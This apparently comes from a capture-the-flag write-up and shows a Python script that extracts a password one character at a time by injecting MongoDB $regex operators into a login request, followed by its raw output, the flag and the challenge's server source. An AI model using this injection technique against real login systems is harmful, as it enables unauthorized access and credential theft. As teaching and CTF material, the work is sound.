whileTrue: for c in string.printable: if c notin ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) r = requests.post(u, data = payload, headers = headers, verify = False) print(r.text + ' ' + str(r.status_code)) #if 'Found' in r.text: if r.status_code == 302: print("Found one more char : %s" % (password+c)) password += c
... Wrong username or password 200 Wrong username or password 200 <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Application Access Page</title></head><body><h2>Here's your first flag: actf{no_sql_doesn't_mean_no_vuln}<br>Access granted, however suspicious activity detected. Please enter password for user<b> 'admin' </b>again, but there will be no database query.</h2><form method="post"><label>Enter Password:</label><input type="text" name="pass2"><br><input type="submit"></form><h4 style="color:red;"></h4><pre>router.post('/site', verifyJwt, function (req, res) { // req.user is assigned from verifyJwt if (!req.user.authenticated || !req.body.pass2) { res.send("bad"); } var query = { username: req.user.name, } var db = req.db; db.collection('users').findOne(query, function (err, user) { console.log(user); if (!user){ res.render('access', {username:' \''+req.user.name+'\' ', message:"Only user 'admin' can log in with this form!"}); } var pass = user.password; var message = ""; if (pass === req.body.pass2){ res.render('final'); } else { res.render('access', {username:' \''+req.user.name+'\' ', message:"Wrong LOL!"}); } }); });</pre></body></html> 200 Wrong username or password 200 Wrong username or password 200 Wrong username or password 200 ...